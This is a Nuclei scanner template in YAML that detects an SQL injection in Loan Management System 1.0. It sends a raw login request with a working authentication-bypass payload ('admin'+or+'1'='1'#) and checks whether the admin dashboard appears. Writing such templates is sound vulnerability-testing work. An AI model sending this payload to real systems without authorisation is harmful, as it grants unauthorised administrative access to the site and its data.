nuclei-templates/vulnerabilities/other/loancms-sqli.yaml

51 lines
1.4 KiB
YAML

id: loancms-sqli
info:
name: Loan Management System 1.0 - SQL Injection
author: arafatansari
severity: critical
description: |
Loan Management System 1.0 contains a SQL injection vulnerability via the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.exploit-db.com/exploits/50402
- https://packetstormsecurity.com/files/167860/Loan-Management-System-1.0-SQL-Injection.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
metadata:
verified: true
tags: auth-bypass,cms,packetstorm,edb,loancms,sqli
requests:
- raw:
- |
POST /ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin'+or+'1'%3D'1'%23&password=nuclei
- |
GET /index.php?page=home HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'window.start_load'
- 'Welcome back Admin'
- 'Loan Management System'
condition: and
- type: word
part: body
words:
- 'login-form'
negative: true
# Enhanced by mp on 2022/09/28